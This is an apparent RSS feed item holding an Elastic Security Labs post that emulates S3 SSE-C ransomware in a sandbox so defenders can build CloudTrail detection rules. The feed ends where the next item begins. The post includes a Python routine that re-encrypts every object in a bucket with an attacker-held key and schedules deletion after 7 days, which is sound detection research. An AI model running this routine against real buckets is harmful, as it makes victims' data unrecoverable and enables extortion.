            <title><![CDATA[Emulating AWS S3 SSE-C Ransom for Threat Detection]]></title>
            <link>https://www.elastic.co/es/security-labs/emulating-aws-s3-sse-c</link>
            <guid>emulating-aws-s3-sse-c</guid>
            <pubDate>Thu, 20 Feb 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[In this article, we’ll explore how threat actors leverage Amazon S3’s Server-Side Encryption with Customer-Provided Keys (SSE-C) for ransom/extortion operations.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>Welcome to another installment of AWS detection engineering with Elastic. You can read the previous installment on <a href="https://www.elastic.co/es/security-labs/exploring-aws-sts-assumeroot">STS AssumeRoot here</a>.</p>
<p>In this article, we’ll explore how threat actors leverage Amazon S3’s Server-Side Encryption with Customer-Provided Keys (SSE-C) for ransom/extortion operations. This contemporary abuse tactic demonstrates the creative ways adversaries can exploit native cloud services to achieve their monetary goals.</p>
<p>As a reader, you’ll gain insights into the inner workings of S3, SSE-C workflows, and bucket configurations. We’ll also walk through the steps of this technique, discuss best practices for securing S3 buckets, and provide actionable guidance for crafting detection logic to identify SSE-C abuse in your environment.</p>
<p>This research builds on a recent <a href="https://www.halcyon.ai/blog/abusing-aws-native-services-ransomware-encrypting-s3-buckets-with-sse-c">publication</a> by the Halcyon Research Team, which documented the first publicly known case of in-the-wild (ItW) abuse of SSE-C for ransomware behavior. Join us as we dive deeper into this emerging threat and demonstrate how to stay ahead of adversaries.</p>
<p>We have published a <a href="https://gist.github.com/terrancedejesus/f703a4a37a70d005080950a418422ac9">gist</a> containing the Terraform code and emulation script referenced in this blog. This content is provided for educational and research purposes only. Please use it responsibly and in accordance with applicable laws and guidelines. Elastic assumes no liability for any unintended consequences or misuse.</p>
<p>Do enjoy!</p>
<h1>Understanding AWS S3: Key Security Concepts and Features</h1>
<p>Before we dive directly into emulation and these tactics, techniques, and procedures (TTPs), let’s briefly review what AWS S3 includes.</p>
<p>S3 is AWS’ common storage service that allows users to store any unstructured or structured data in “buckets”. These buckets are similar to folders that one would find locally on their computer system. The data stored in these buckets are called <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingObjects.html">objects</a>, and each object is uniquely identified by an object key, which functions like a filename. S3 supports many data formats, from JSON to media files and much more, making it ideal for a variety of organizational use cases.</p>
<p><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingBucket.html">Buckets</a> can be <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/creating-buckets-s3.html">set up</a> to store objects from various AWS S3 services, but they can also be populated manually or programmatically depending on the use case. Additionally, buckets can leverage versioning to maintain multiple versions of objects, which provides resilience against accidental deletions or overwrites. However, versioning is not always enabled by default, leaving data vulnerable to certain types of attacks, such as those involving ransomware or bulk deletions.</p>
<p>Access to these buckets depends heavily on their access policies, typically defined during creation. These policies include settings such as disabling public access to prevent unintended exposure of bucket contents. Configuration doesn’t stop there, though; buckets also have their own unique Amazon Resource Name (ARN), which allows further granular access policies to be defined via identity access management (IAM) roles or policies. For example, if user “Alice” needs access to a bucket and its objects, specific permissions such as <code>s3:GetObject</code>, must be assigned to their IAM role. That role can either be applied directly to Alice as a permission policy or to an associated group they belong to.</p>
<p>While these mechanisms seem foolproof, misconfigurations in access controls (e.g., overly permissive bucket policies or access control lists) are a common cause of security incidents. For example, as of this writing, approximately 325.8k buckets are publicly available according to <a href="http://buckets.grayhatwarfare.com">buckets.grayhatwarfare.com</a>. Elastic Security Labs also observed that 30% of failed AWS posture checks were connected to S3 in the <a href="https://www.elastic.co/es/resources/security/report/global-threat-report">2024 Elastic Global Threat Report</a>.</p>
<p><strong>Server-Side Encryption in S3</strong><br />
S3 provides <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucket-encryption.html">multiple encryption options</a> for securing data at rest. These include:</p>
<ul>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingServerSideEncryption.html">SSE-S3</a>: Encryption keys are fully managed by AWS.</li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/UsingKMSEncryption.html">SSE-KMS</a>: Keys are managed through AWS Key Management Service (KMS), allowing for more custom key policies and access control — see how these are <a href="https://www.elastic.co/es/blog/encryption-at-rest-elastic-cloud-aws-kms">implemented in Elastic</a>.</li>
<li><a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerSideEncryptionCustomerKeys.html">SSE-C</a>: Customers provide their own encryption keys for added control. This option is often used for compliance or specific security requirements but introduces additional operational overhead, such as securely managing and storing keys. Importantly, AWS does not store SSE-C keys; instead, a key’s HMAC (hash-based message authentication code) is logged for verification purposes.</li>
</ul>
<p>In the case of SSE-C, mismanagement of encryption keys or intentional abuse (e.g., ransomware) can render data permanently inaccessible.</p>
<p><strong>Lifecycle Policies</strong></p>
<p>S3 buckets can also utilize <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html">lifecycle policies</a>, which automate actions such as transitioning objects to cheaper storage classes (e.g., Glacier) or deleting objects after a specified time. While these policies are typically used for cost optimization, they can be exploited by attackers to schedule the deletion of critical data, increasing pressure during a ransom incident.</p>
<p><strong>Storage Classes</strong></p>
<p>Amazon S3 provides multiple <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/storage-class-intro.html">storage classes</a>, each designed for different access patterns and frequency needs. While storage classes are typically chosen for cost optimization, understanding them is crucial when considering how encryption and security interact with data storage.</p>
<p>For example, S3 Standard and Intelligent-Tiering ensure frequent access with minimal latency, making them suitable for live applications. On the other hand, archival classes like Glacier Flexible Retrieval and Deep Archive introduce delays before data can be accessed, which can complicate incident response in security scenarios.</p>
<p>This becomes particularly relevant when encryption is introduced. Server-Side Encryption (SSE) works across all storage classes, but SSE-C (Customer-Provided Keys) shifts the responsibility of key management to the user or adversary. Unlike AWS-managed encryption (SSE-S3, SSE-KMS), SSE-C requires that every retrieval operation supply the original encryption key; if that key is lost or withheld by an adversary, the data is permanently unrecoverable.</p>
<p>With this understanding, a critical question arises about the implications of SSE-C abuse observed in the wild: What happens when an attacker gains access to publicly exposed or misconfigured S3 buckets and has control over both the storage policy and encryption keys?</p>
<h1>Thus Begins: SSE-C Abuse for Ransom Operations</h1>
<p>In the following section, we will share a hands-on approach to emulating this behavior in our sandbox AWS environment by completing the following:</p>
<ol>
<li>Deploy vulnerable infrastructure via Infrastructure-as-Code (IaC) provider Terraform</li>
<li>Explore how to craft SSE-C requests in Python</li>
<li>Detonate a custom script to emulate the ransom behavior described in the Halcyon blog</li>
</ol>
<h2>Pre-requisites</h2>
<p>This article is about recreating a specific scenario for detection engineering. If this is your goal, the following needs to be established first.</p>
<ul>
<li><a href="https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli">Terraform</a> must be installed locally</li>
<li>Python 3.9+ must also be installed locally to be used for the virtual environment and to run an emulation script</li>
<li><a href="https://aws.amazon.com/cli/">AWS CLI</a> profile must be set up with administrative privileges to be used by Terraform during infrastructure deployment</li>
</ul>
<h1>Deploying Vulnerable Infrastructure</h1>
<p>For our whitebox emulation, it is important to replicate an S3 configuration that an organization might have in a real-world scenario. Below is a summary of the infrastructure deployed:</p>
<ul>
<li><strong>Region</strong>: us-east-1 (default deployment region)</li>
<li><strong>S3 Bucket</strong>: A uniquely named payroll data bucket that contains sensitive data and allows adversary-controlled encryption</li>
<li><strong>Bucket Ownership Controls</strong>: Enforces &quot;BucketOwnerEnforced&quot; to prevent ACL-based permissions</li>
<li><strong>Public Access Restrictions</strong>: Public access is fully blocked to prevent accidental exposure</li>
<li><strong>IAM User</strong>: A compromised adversary-controlled IAM user with excessive S3 permissions; no login profile is assigned, as access key credentials are used programmatically elsewhere for automated tasks</li>
<li><strong>IAM Policy</strong>: At both bucket and object levels, adversaries have authorization to:
<ul>
<li><code>s3:GetObject</code></li>
<li><code>s3:PutObject</code></li>
<li><code>s3:DeleteObject</code></li>
<li><code>s3:PutLifecycleConfiguration</code></li>
<li><code>s3:ListObjects</code></li>
<li><code>s3:ListBucket</code></li>
</ul>
</li>
<li><strong>IAM Access Keys</strong>: Access keys are generated for the adversary user, allowing programmatic access</li>
<li><strong>Dummy Data</strong>: Simulated sensitive data (<code>customer_data.csv</code>) is uploaded to the bucket</li>
</ul>
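<p>As an illustration only, the adversary's permission policy could look roughly like the document below when rendered as JSON. The bucket name is a placeholder and the statement is a sketch, not the exact Terraform from the gist (note that object listing is granted via the <code>s3:ListBucket</code> IAM action):</p>

```python
import json

# Hypothetical minimal IAM policy matching the permissions listed above.
# The bucket ARN is a placeholder, not the real deployed bucket.
policy = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:PutObject",
                "s3:DeleteObject",
                "s3:PutLifecycleConfiguration",
                "s3:ListBucket",
            ],
            # Bucket-level ARN for ListBucket/PutLifecycleConfiguration,
            # object-level ARN (/*) for Get/Put/DeleteObject.
            "Resource": [
                "arn:aws:s3:::example-payroll-bucket",
                "arn:aws:s3:::example-payroll-bucket/*",
            ],
        }
    ],
}
print(json.dumps(policy, indent=2))
```

<p>Splitting the resource between the bucket ARN and the <code>/*</code> object ARN matters: bucket-level actions and object-level actions are evaluated against different resource types.</p>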
<p>Understanding the infrastructure is critical for assessing how this type of attack unfolds. The Halcyon blog describes the attack methodology but provides little detail on the specific AWS configuration of the affected organizations. These details are essential for determining the feasibility of such an attack and the steps required for successful execution.</p>
<h2>Bucket Accessibility and Exposure</h2>
<p>For an attack of this nature to occur, an adversary must gain access to an S3 bucket through one of two primary methods:</p>
<p><strong>Publicly Accessible Buckets</strong>: If a bucket is misconfigured with a public access policy, an adversary can directly interact with it, provided the bucket’s permission policy allows actions such as <em><code>s3:PutObject</code></em>, <code>s3:DeleteObject</code>, or <code>s3:PutLifecycleConfiguration</code>. These permissions are often mistakenly assigned using a wildcard (*) principal, meaning anyone can execute these operations.</p>
<p><strong>Compromised Credentials</strong>: If an attacker obtains AWS credentials (via credential leaks, phishing, or malware), they can authenticate as a legitimate IAM user and interact with S3 as if they were the intended account owner.</p>
<p>In our emulation, we assume the bucket is not public, meaning the attack relies on compromised credentials. This requires the adversary to have obtained valid AWS access keys and to have performed cloud infrastructure discovery to identify accessible S3 buckets. This is commonly done using AWS API calls, such as <code>s3:ListAllMyBuckets</code>, <code>s3:ListBuckets</code>, or <code>s3:ListObjects</code>, which reveal buckets and their contents in specific regions.</p>
<p><strong>Required IAM Permissions for Attack Execution:</strong> To encrypt files using SSE-C and enforce a deletion policy successfully, the adversary must have appropriate IAM permissions. In our emulation, we configured explicit permissions for the compromised IAM user, but in a real-world scenario, multiple permission models could allow this attack:</p>
<ul>
<li><strong>Custom Overly-Permissive Policies</strong>: Organizations may unknowingly grant broad S3 permissions without strict constraints.</li>
<li><strong>AWS-Managed Policies:</strong> The adversary may have obtained credentials associated with a user or role that has <code>AmazonS3FullAccess</code> or <code>AdministratorAccess</code>.</li>
<li><strong>Partial Object-Level Permissions</strong>: If the IAM user had only <em><code>AllObjectActions</code></em>, this would allow object-level actions but would not grant lifecycle policy modifications or bucket listing, the latter being necessary to enumerate objects before iterating over them to encrypt and overwrite.</li>
</ul>
<p>The Halcyon blog does not specify which permissions were abused, but our whitebox emulation ensures that the minimum necessary permissions are in place for the attack to function as described.</p>
<p><strong>The Role of the Compromised IAM User</strong><br />
Another critical factor is the type of IAM user whose credentials were compromised. In AWS, an adversary does not necessarily need credentials for a user that has an interactive login profile. Many IAM users are created exclusively for programmatic access and do not require an AWS Management Console password or Multi-Factor Authentication (MFA), both of which could serve as additional security blockers.</p>
<p>This means that if the stolen credentials belonging to an IAM user are used for automation or service integration, the attacker would have an easier time executing API requests without additional authentication challenges.</p>
<p>While the Halcyon blog effectively documents the technique used in this attack, it does not include details about the victim's underlying AWS configuration. Understanding the infrastructure behind the attacks — such as bucket access, IAM permissions, and user roles — is essential to assessing how these ransom operations unfold in practice. Since these details are not provided, we must make informed assumptions to better understand the conditions that allowed the attack to succeed.</p>
<p>Our emulation is designed to replicate the minimum necessary conditions for this type of attack, ensuring a realistic assessment of defensive strategies and threat detection capabilities. By exploring the technical aspects of the infrastructure, we can provide deeper insights into potential mitigations and how organizations can proactively defend against similar threats.</p>
<h2>Setting Up Infrastructure</h2>
<p>For our infrastructure deployment, we utilize Terraform as our IaC framework. To keep this publication streamlined, we have stored both the Terraform configuration and the atomic emulation script in a downloadable <a href="https://gist.github.com/terrancedejesus/f703a4a37a70d005080950a418422ac9">gist</a> for easy access. Below is the expected local file structure once these files are downloaded.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image2.png" alt="Necessary folder structure when downloading gist" /></p>
<p>After setting up the required files locally, you can create a Python virtual environment for this scenario and install the necessary dependencies. Once the environment is configured, the following command will initialize Terraform and deploy the infrastructure:</p>
<p>Command: <code>python3 s3_sse_c_ransom.py deploy</code></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image7.png" alt="Expected console output after terraform initialized and deployed" /></p>
<p>Once deployment is complete, the required AWS infrastructure will be in place to proceed with the emulation and execution of the attack. It’s important to note that public access is blocked, and the IAM policy is only applied to the dynamically generated IAM user for security reasons. However, we strongly recommend tearing down the infrastructure once testing is complete or after capturing the necessary data.</p>
<p>If you happen to log in to your AWS console or use the CLI, you can verify that the bucket in the <code>us-east-1</code> region exists and contains <code>customer_data.csv</code>, which, when downloaded, will be in plaintext. You will also note that no “ransom.note” file exists yet.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image6.png" alt="Example of infrastructure deployed with unencrypted customer data in our S3 bucket" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image4.png" alt="Another example of infrastructure deployed with no ransom.txt file yet" /></p>
<h2>Explore How to Craft S3 SSE-C Requests in Python</h2>
<p>Before executing the atomic emulation, it is important to explore the underlying tradecraft that enables an adversary to successfully carry out this attack ItW.</p>
<p>For those familiar with AWS, S3 operations — such as accessing buckets, listing objects, or encrypting data — are typically straightforward when using the AWS SDKs or AWS CLI. These tools abstract much of the complexity, allowing users to execute operations without needing a deep understanding of the underlying API mechanics. This also lowers the knowledge barrier for an adversary attempting to abuse these functionalities.</p>
<p>However, the Halcyon blog notes a critical technical detail about the attack execution:</p>
<p>“<em>The attacker initiates the encryption process by calling the x-amz-server-side-encryption-customer-algorithm header, utilizing an AES-256 encryption key they generate and store locally.</em>”</p>
<p>The key distinction here is the use of the <code>x-amz-server-side-encryption-customer-algorithm</code> header, which is required for encryption operations in this attack. According to AWS <a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerSideEncryptionCustomerKeys.html#ssec-and-presignedurl">documentation</a>, this SSE-C header is typically specified when creating pre-signed URLs and leveraging SSE-C in S3. This means that the attacker not only encrypts the victim's data but does so in a way that AWS itself does not store the encryption key, rendering recovery impossible without the attacker's cooperation.</p>
<h3>Pre-Signed URLs and Their Role in SSE-C Abuse</h3>
<p><strong>What are pre-signed URLs?</strong><br />
<a href="https://docs.aws.amazon.com/AmazonS3/latest/userguide/using-presigned-url.html">Pre-signed URLs</a> are signed API requests that allow users to perform specific S3 operations for a limited time. These URLs are commonly used to securely share objects without exposing AWS credentials. A pre-signed URL grants temporary access to an S3 object and can be accessed through a browser or used programmatically in API requests.</p>
<p>In a typical AWS environment, users leverage SDKs or CLI wrappers for pre-signed URLs. However, when using SSE-C, AWS requires additional headers for encryption or decryption.</p>
<p><strong>SSE-C and Required HTTP Headers</strong><br />
When making SSE-C requests — either via the AWS SDK or direct S3 REST API calls — the following headers must be included:</p>
<ul>
<li><strong>x-amz-server-side-encryption-customer-algorithm</strong>: Specifies the encryption algorithm; must be AES256 (as noted in Halcyon’s report)</li>
<li><strong>x-amz-server-side-encryption-customer-key</strong>: Provides a 256-bit, base64-encoded encryption key for S3 to use to encrypt or decrypt your data</li>
<li><strong>x-amz-server-side-encryption-customer-key-MD5</strong>: Provides a base64-encoded 128-bit MD5 digest of the encryption key; S3 uses this header for a message integrity check to ensure that the encryption key was transmitted without error or tampering</li>
</ul>
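<p>Assuming a locally generated random 256-bit key, the three header values can be derived with a few lines of Python. This is a sketch of the derivation described in the AWS SSE-C documentation, not code recovered from the attack:</p>

```python
import base64
import hashlib
import os

# A random AES-256 key, generated and held entirely client-side. AWS never
# stores this key; a client (or adversary) must retain it to decrypt the object.
key = os.urandom(32)

# The three SSE-C request headers derived from that key.
headers = {
    "x-amz-server-side-encryption-customer-algorithm": "AES256",
    "x-amz-server-side-encryption-customer-key": base64.b64encode(key).decode(),
    "x-amz-server-side-encryption-customer-key-MD5": base64.b64encode(
        hashlib.md5(key).digest()  # integrity check over the key itself
    ).decode(),
}
for name, value in headers.items():
    print(name, value)
```

<p>Because only the base64-encoded key travels with each request and S3 discards it after use, losing (or withholding) the raw key bytes makes the encrypted objects unrecoverable.</p>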
<p>When looking for detection opportunities, these details are crucial.</p>
<p><strong>AWS Signature Version 4 (SigV4) and Its Role</strong></p>
<p>Requests to S3 are either authenticated or anonymous. Since SSE-C encryption with pre-signed URLs requires <a href="https://docs.aws.amazon.com/AmazonS3/latest/API/sig-v4-authenticating-requests.html#signing-request-intro">authentication</a>, all requests must be cryptographically signed to prove their legitimacy. This is where AWS Signature Version 4 (SigV4) comes in.</p>
<p>AWS SigV4 is an authentication mechanism that ensures API requests to AWS services are signed and verified. This is particularly important for SSE-C operations, as modifying objects in S3 requires authenticated API calls.</p>
<p>For this attack, each encryption request must be signed by:</p>
<ol>
<li>Generating a cryptographic signature using AWS SigV4</li>
<li>Including the signature in the request headers</li>
<li>Attaching the necessary SSE-C encryption headers</li>
<li>Sending the request to S3 to overwrite the object with the encrypted version</li>
</ol>
<p>Without proper SigV4 signing, AWS would reject these requests. Because the requests in the reported attack were not rejected (nor were they in our testing), the activity had to rely on compromised, valid AWS credentials rather than an exposed, publicly accessible S3 bucket. It also suggests the adversaries understood not only S3 buckets and their respective object access controls, but also the nuances of authentication and encryption in AWS.</p>
<h1>Detonating our Atomic Emulation</h1>
<p>Our atomic emulation will use the “compromised” credentials of an IAM user with no login profile and a permission policy that allows several S3 actions against our target bucket. As a reminder, the infrastructure and environment for this exercise were deployed in the “Setting Up Infrastructure” section, referencing our shared gist.</p>
<p>Below is a step-by-step workflow of the emulation.</p>
<ol>
<li>Load stolen AWS credentials (Retrieved from environment variables)</li>
<li>Establish S3 client with compromised credentials</li>
<li>Generate S3 endpoint URL (Construct the bucket’s URL)</li>
<li>Enumerate S3 objects → s3:ListObjectsV2 (Retrieve object list)</li>
<li>Generate AES-256 encryption key (Locally generated)</li>
<li>Start Loop (For each object in bucket)
<ol>
<li>Generate GET request &amp; sign with AWS SigV4 (authenticate request)</li>
<li>Retrieve object from S3 → s3:GetObject (fetch unencrypted data)</li>
<li>Generate PUT request &amp; sign with AWS SigV4 (attach SSE-C headers)</li>
<li>Encrypt &amp; overwrite object in S3 → s3:PutObject (encrypt with SSE-C)</li>
</ol>
</li>
<li>End loop</li>
<li>Apply 7-Day deletion policy → s3:PutLifecycleConfiguration (time-restricted data destruction)</li>
<li>Upload ransom note to S3 → s3:PutObject (Extortion message left for victim)</li>
</ol>
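<p>The loop in steps 4–7 maps onto a handful of S3 API calls. Below is a minimal sketch of that logic — not the full emulation script — written so the client is passed in (with real stolen credentials it would be a <code>boto3.client(&quot;s3&quot;, ...)</code>). Bucket and object names are illustrative; note that boto3 derives the key-MD5 header automatically from <code>SSECustomerKey</code>:</p>

```python
def encrypt_bucket_objects(s3, bucket: str, key: bytes) -> list:
    """Re-upload every object in `bucket`, encrypted with a customer-provided key (SSE-C)."""
    encrypted = []
    # Step 4: enumerate objects (s3:ListObjectsV2)
    for obj in s3.list_objects_v2(Bucket=bucket).get("Contents", []):
        name = obj["Key"]
        # Steps 6a-b: signed GET of the plaintext object (s3:GetObject)
        body = s3.get_object(Bucket=bucket, Key=name)["Body"].read()
        # Steps 6c-d: signed PUT overwriting it with SSE-C (s3:PutObject);
        # boto3 adds the -customer-key and -customer-key-MD5 headers for us
        s3.put_object(
            Bucket=bucket, Key=name, Body=body,
            SSECustomerAlgorithm="AES256", SSECustomerKey=key,
        )
        encrypted.append(name)
    # Step 7: time-restricted destruction via a 7-day expiration lifecycle
    s3.put_bucket_lifecycle_configuration(
        Bucket=bucket,
        LifecycleConfiguration={"Rules": [{
            "ID": "expire-7d", "Status": "Enabled",
            "Filter": {}, "Expiration": {"Days": 7},
        }]},
    )
    return encrypted
```

<p>The step 5 key would come from something like <code>os.urandom(32)</code> and, on the adversary side, never touch the victim’s infrastructure — which is what makes recovery without the ransom key infeasible.</p>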
<p>Below is a visual representation of this emulation workflow:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image10.png" alt="Visual representation of emulation workflow" /></p>
<p>In our Python script, we have intentionally added a prompt that requires the user to confirm they agree not to abuse the script. A second prompt during detonation stalls execution, giving time for investigation in AWS if necessary before the S3 objects are effectively lost. Because SSE-C is used, the objects end up encrypted with a key that Terraform does not have access to, so attempts to manage them afterward would fail.</p>
<p>Command: <code>python s3_sse_c_ransom.py detonate</code></p>
<p>After detonation, the objects in our S3 bucket will be encrypted with SSE-C, a ransom note will have been uploaded, and an expiration lifecycle will have been added.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image3.png" alt="Expected console output when detonating SSE-C ransom emulation" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image5.png" alt="Expected artifacts in S3 bucket after detonating SSE-C ransom emulation" /></p>
<p>If you try to access the <code>customer_data.csv</code> object, AWS will reject the request because it was stored using server-side encryption. To retrieve the object, a signed request that includes the correct AES-256 encryption key is required.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image1.png" alt="Expected error when retrieving objects from S3 bucket after SSE-C encryption" /></p>
<h1>Cleanup</h1>
<p>Cleanup for this emulation is relatively simple. If you chose to keep the S3 objects during detonation, start with step 1; otherwise, go straight to step 5.</p>
<ol>
<li>Go to the <code>us-east-1</code> region</li>
<li>Navigate to S3</li>
<li>Locate the <code>s3-sse-c-ransomware-payroll-XX</code> bucket</li>
<li>Remove all objects</li>
<li>Command: <code>python s3_sse_c_ransom.py cleanup</code></li>
</ol>
<p>Once completed, everything deployed initially will be removed.</p>
<h1>Detection and Hunting Strategies</h1>
<p>After our atomic emulation, it’s critical to share how we can effectively detect this ransom behavior based on the API event logs provided by AWS CloudTrail. Note that we will be leveraging the <a href="https://www.elastic.co/es/elastic-stack">Elastic Stack</a> for data ingestion and initial query development; however, the query logic and context should be translatable to <a href="https://www.elastic.co/es/security/siem">your SIEM of choice</a>. It is also important that S3 data events in your CloudTrail configuration are set to “Log all events.”</p>
<h2>Unusual AWS S3 Object Encryption with SSE-C</h2>
<p>The goal of this detection strategy is to identify PutObject requests that leverage SSE-C, as customer-provided encryption keys can be a strong indicator of anomalous activity — especially if an organization primarily uses AWS-managed encryption through KMS (SSE-KMS) or S3's native encryption (SSE-S3).</p>
<p>In our emulation, <code>PutObject</code> requests were configured with the <code>x-amz-server-side-encryption-customer-algorithm</code> header set to <code>AES256</code>, signaling to AWS that customer-provided keys were used for encryption (SSE-C).</p>
<p>Fortunately, AWS CloudTrail logs these encryption details within request parameters, allowing security teams to detect unusual SSE-C usage. Key CloudTrail attributes to monitor include:</p>
<ul>
<li><em>SignatureVersion</em>: SigV4 → Signals that this request was signed</li>
<li><em>SSEApplied: SSE_C</em> → Signals that server-side customer key encryption was used</li>
<li><em>bucketName: s3-sse-c-ransomware-payroll-96</em> → Signals which bucket this happened to</li>
<li><em>x-amz-server-side-encryption-customer-algorithm: AES256</em> → Signals which algorithm was used for the customer encryption key</li>
<li><em>key: customer_data.csv</em> → Indicates the name of the object this was applied to</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/image9.png" alt="Partial Elastic document from CloudTrail ingestion showing SSE-C request from emulation" /></p>
<p>With these details we can already craft a threat detection query that would match these events and ultimately the threat reported in the original Halcyon blog.</p>
<table>
<thead>
<tr>
<th align="left">event.dataset: &quot;aws.cloudtrail&quot; and event.provider: &quot;s3.amazonaws.com&quot; and event.action: &quot;PutObject&quot; and event.outcome: &quot;success&quot; and aws.cloudtrail.flattened.request_parameters.x-amz-server-side-encryption-customer-algorithm: &quot;AES256&quot; and aws.cloudtrail.flattened.additional_eventdata.SSEApplied: &quot;SSE_C&quot;</th>
</tr>
</thead>
</table>
<p>While this detection is broad, organizations should tailor it to their environment by asking:</p>
<ul>
<li>Do we expect pre-signed URLs with SigV4 for S3 bucket or object operations?</li>
<li>Do we expect SSE-C to be used for <em>PutObject</em> operations in S3 or this specific bucket?</li>
</ul>
<p><strong>Reducing False-Positives With New Term Rule Types</strong><br />
To minimize false positives (FPs), we can leverage Elastic’s <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html#create-new-terms-rule">New Terms rule type</a>, which helps detect first-time occurrences of suspicious activity. Instead of alerting on every match, we track unique combinations of IAM users and affected S3 buckets, only generating an alert when this behavior is observed for the first time within a set period. Some of the unique combinations we watch for are:</p>
<ul>
<li>Unique IAM users (ARNs) performing SSE-C encryption in S3.</li>
<li>Specific buckets where SSE-C is applied.</li>
</ul>
<p>These alerts only trigger if this activity has been observed for the first time in the last 14 days.</p>
<p>This adaptive approach ensures that legitimate use cases are learned over time, preventing repeated alerts on expected operations. At the same time, it flags anomalous first-time occurrences of SSE-C in S3, aiding in early threat detection. As needed, rule exceptions can be added for specific user identity ARNs, buckets, objects, or even source IPs to refine detection logic. By incorporating historical context and behavioral baselines, this method enhances signal fidelity, improving both the effectiveness of detections and the actionability of alerts.</p>
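<p>The first-seen logic behind a New Terms rule can be illustrated in a few lines — a toy sketch of the concept, not Elastic’s implementation: record a timestamp per (user ARN, bucket) combination and alert only when that combination has not been seen within the lookback window.</p>

```python
from datetime import datetime, timedelta

class NewTermsTracker:
    """Toy model of a New Terms rule: alert only on first-seen term combinations."""

    def __init__(self, lookback_days: int = 14):
        self.lookback = timedelta(days=lookback_days)
        self.last_seen = {}  # (user_arn, bucket) -> time of last matching event

    def should_alert(self, user_arn: str, bucket: str, when: datetime) -> bool:
        term = (user_arn, bucket)
        seen = self.last_seen.get(term)
        self.last_seen[term] = when
        # Alert if the combination was never seen, or aged out of the window
        return seen is None or when - seen > self.lookback
```

<p>A repeated (user, bucket) pair inside the window stays silent, while a new user, a new bucket, or activity resuming after the window expires raises an alert — the same baseline-learning behavior described above.</p>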
<p><strong>Rule References</strong></p>
<p><a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml">Unusual AWS S3 Object Encryption with SSE-C</a><br />
<a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_s3_excessive_object_encryption_with_sse_c.toml">Excessive AWS S3 Object Encryption with SSE-C</a></p>
<h1>Conclusion</h1>
<p>We sincerely appreciate you taking the time to read this publication and, if you did, for trying out the emulation yourself. Whitebox testing plays a crucial role in cloud security, enabling us to replicate real-world threats, analyze their behavioral patterns, and develop effective detection strategies. With cloud-based attacks becoming increasingly prevalent, it is essential to understand the tooling behind adversary tactics and to share research findings with the broader security community.</p>
<p>If you're interested in exploring our AWS detection ruleset, you can find it here: <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/aws">Elastic AWS Detection Rules</a>. We also welcome <a href="https://github.com/elastic/detection-rules/tree/main?tab=readme-ov-file#how-to-contribute">contributions</a> to enhance our ruleset—your efforts help strengthen collective defenses, and we greatly appreciate them!</p>
<p>We encourage anyone with interest to review Halcyon’s publication and thank them ahead of time for sharing their research!</p>
<p>Until next time.</p>
<h1>Important References:</h1>
<p><a href="https://www.halcyon.ai/blog/abusing-aws-native-services-ransomware-encrypting-s3-buckets-with-sse-c">Halcyon Research Blog on SSE-C ItW</a><br />
<a href="https://gist.github.com/terrancedejesus/f703a4a37a70d005080950a418422ac9">Elastic Emulation Code for SSE-C in AWS</a><br />
<a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/aws">Elastic Pre-built AWS Threat Detection Ruleset</a><br />
<a href="https://github.com/elastic/detection-rules">Elastic Pre-built Detection Rules Repository</a><br />
Rule: <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml">Unusual AWS S3 Object Encryption with SSE-C</a><br />
Rule: <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/impact_s3_excessive_object_encryption_with_sse_c.toml">Excessive AWS S3 Object Encryption with SSE-C</a></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/emulating-aws-s3-sse-c/Security Labs Images 11.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Exploring AWS STS AssumeRoot]]></title>
            <link>https://www.elastic.co/es/security-labs/exploring-aws-sts-assumeroot</link>
            <guid>exploring-aws-sts-assumeroot</guid>
            <pubDate>Tue, 10 Dec 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore AWS STS AssumeRoot, its risks, detection strategies, and practical scenarios to secure against privilege escalation and account compromise using Elastic's SIEM and CloudTrail data.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Welcome to another installment of AWS detection engineering with Elastic. This article will dive into the new AWS Security Token Service (STS) API operation, AssumeRoot, simulate some practical behavior in a sandbox AWS environment, and explore detection capabilities within Elastic’s SIEM.</p>
<p>What to expect from this article:</p>
<ul>
<li>Basic insight into AWS STS web service</li>
